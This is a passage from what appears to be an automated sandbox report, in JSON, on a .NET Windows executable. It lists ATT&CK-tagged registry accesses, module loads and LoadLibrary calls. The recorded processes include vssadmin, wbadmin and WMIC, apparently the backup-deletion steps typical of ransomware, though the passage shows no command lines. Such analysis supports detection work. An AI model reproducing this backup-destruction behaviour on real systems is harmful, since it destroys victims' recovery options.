\"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"WMIC.exe\" touched \"WBEM Locator\" (Path: \"HKCU\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\")\n \"WMIC.exe\" touched \"Free Threaded XML DOM Document\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{F6D90F12-9C73-11D3-B32E-00C04F990BB4}\")\n \"WMIC.exe\" touched \"Windows Management and Instrumentation\" (Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\TREATAS\")\n \"WMIC.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\TREATAS\")\n \"WMIC.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IWbemServices\" (Path: \"HKCU\\CLSID\\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\\TREATAS\")\n \"WMIC.exe\" touched \"Microsoft WBEM WbemClassObject Marshalling proxy\" (Path: \"HKCU\\CLSID\\{4590F812-1D3A-11D0-891F-00AA004B2E24}\\TREATAS\")\n \"WMIC.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject\" (Path: \"HKCU\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"svchost.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75340000\n \"WMIC.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75340000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"svchost.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"svchost.exe\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"svchost.exe\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d90000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"KERNEL32\" at base 77510000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"ADVAPI32.DLL\" at base 76ea0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6c060000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"SHLWAPI.DLL\" at base 77310000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"VERSION.DLL\" at base 74cc0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 64fd0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"USER32.DLL\" at base 77080000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"MSCOREE.DLL\" at base 6c0f0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"PSAPI.DLL\" at base 77a70000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"RPCRT4.DLL\" at base 76050000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"KERNEL32.DLL\" at base 77510000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63bc0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"OLE32.DLL\" at base 75ba0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"CRYPTBASE.DLL\" at base 75720000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6bdc0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 692c0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 63160000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"SSPICLI.DLL\" at base 756b0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"SHELL32.DLL\" at base 76250000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\NTDLL.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"NTDLL.DLL\" at base 77920000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74630000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"PROPSYS.DLL\" at base 74340000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"COMCTL32.DLL\" at base 746f0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"OLEAUT32.DLL\" at base 77640000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"CLBCATQ.DLL\" at base 77170000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74340000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"NTMARTA.DLL\" at base 74c90000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77b50000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"PROFAPI.DLL\" at base 75830000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"APPHELP.DLL\" at base 756d0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6e840000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76250000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77510000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"SETUPAPI.DLL\" at base 77370000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 759a0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76100000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"SECUR32.DLL\" at base 75550000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75af0000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70b10000\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 756d0000\n \"svchost.exe\" loaded module \"GDI32.DLL\" at base 775f0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77150000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d90000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 77510000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 76050000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74630000\n \"svchost.exe\" loaded module \"ADVAPI32.DLL\" at base 76ea0000\n \"svchost.exe\" loaded module \"PROPSYS.DLL\" at base 74340000\n \"svchost.exe\" loaded module \"OLE32.DLL\" at base 75ba0000\n \"svchost.exe\" loaded module \"COMCTL32.DLL\" at base 746f0000\n \"svchost.exe\" loaded module \"OLEAUT32.DLL\" at base 77640000\n \"svchost.exe\" loaded module \"APPHELP.DLL\" at base 756d0000\n \"svchost.exe\" loaded module \"CLBCATQ.DLL\" at base 77170000\n \"svchost.exe\" loaded module \"KERNEL32.DLL\" at base 77510000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6ab10000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77510000\n \"svchost.exe\" loaded module \"SETUPAPI.DLL\" at base 77370000\n \"svchost.exe\" loaded module \"SHELL32.DLL\" at base 76250000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74340000\n \"svchost.exe\" loaded module \"NTMARTA.DLL\" at base 74c90000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77b50000\n \"svchost.exe\" loaded module \"PROFAPI.DLL\" at base 75830000\n \"svchost.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 759a0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76100000\n \"svchost.exe\" loaded module \"SECUR32.DLL\" at base 75550000\n \"svchost.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75af0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 756d0000\n \"vssadmin.exe\" loaded module \"RPCRT4.DLL\" at base 76050000\n \"vssadmin.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77b50000\n \"vssadmin.exe\" loaded module \"ADVAPI32.DLL\" at base 76ea0000\n \"vssadmin.exe\" loaded module \"CLBCATQ.DLL\" at base 77170000\n \"vssadmin.exe\" loaded module \"CRYPTSP.DLL\" at base 75230000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74fc0000\n \"vssadmin.exe\" loaded module \"KERNEL32.DLL\" at base 77510000\n \"vssadmin.exe\" loaded module \"CRYPTBASE.DLL\" at base 75720000\n \"vssadmin.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 757c0000\n \"vssadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VSS_PS.DLL\" at base 6d120000\n \"vssadmin.exe\" loaded module \"OLE32.DLL\" at base 75ba0000\n \"vssadmin.exe\" loaded module \"OLEAUT32.DLL\" at base 77640000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d90000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WMIC.exe\" loaded module \"KERNEL32\" at base 77510000\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WMIC.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77510000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSXML3.DLL\" at base 65dc0000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 759a0000\n \"WMIC.exe\" loaded module \"ADVAPI32.DLL\" at base 76ea0000\n \"WMIC.exe\" loaded module \"URLMON.DLL\" at base 76100000\n \"WMIC.exe\" loaded module \"WININET.DLL\" at base 75da0000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75af0000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74630000\n \"WMIC.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 724e0000\n \"WMIC.exe\" loaded module \"CRYPTSP.DLL\" at base 75230000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74fc0000\n \"WMIC.exe\" loaded module \"CRYPTBASE.DLL\" at base 75720000\n \"WMIC.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 757c0000\n \"WMIC.exe\" loaded module \"%COMMONPROGRAMFILES%\\MICROSOFT SHARED\\OFFICE14\\MSOXMLMF.DLL\" at base 6c200000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6d610000\n \"WMIC.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6e410000\n \"WMIC.exe\" loaded module \"OLEAUT32.DLL\" at base 77640000\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 756d0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d90000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77510000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32.DLL\" at base 77510000\n \"wbadmin.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d90000\n \"wbadmin.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"wbadmin.exe\" loaded module \"KERNEL32\" at base 77510000\n \"wbadmin.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"wbadmin.exe\" loaded module \"CRYPTBASE.DLL\" at base 75720000\n \"wbadmin.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77b50000\n \"wbadmin.exe\" loaded module \"ADVAPI32.DLL\" at base 76ea0000\n \"wbadmin.exe\" loaded module \"CLBCATQ.DLL\" at base 77170000\n \"wbadmin.exe\" loaded module \"CRYPTSP.DLL\" at base 75230000\n \"wbadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74fc0000\n \"wbadmin.exe\" loaded module \"KERNEL32.DLL\" at base 77510000\n \"wbadmin.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 757c0000\n \"wbadmin.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BLB_PS.DLL\" at base 6bc20000\n \"wbadmin.exe\" loaded module \"OLEAUT32.DLL\" at base 77640000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005776)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"LoadLibrary\" with a parameter 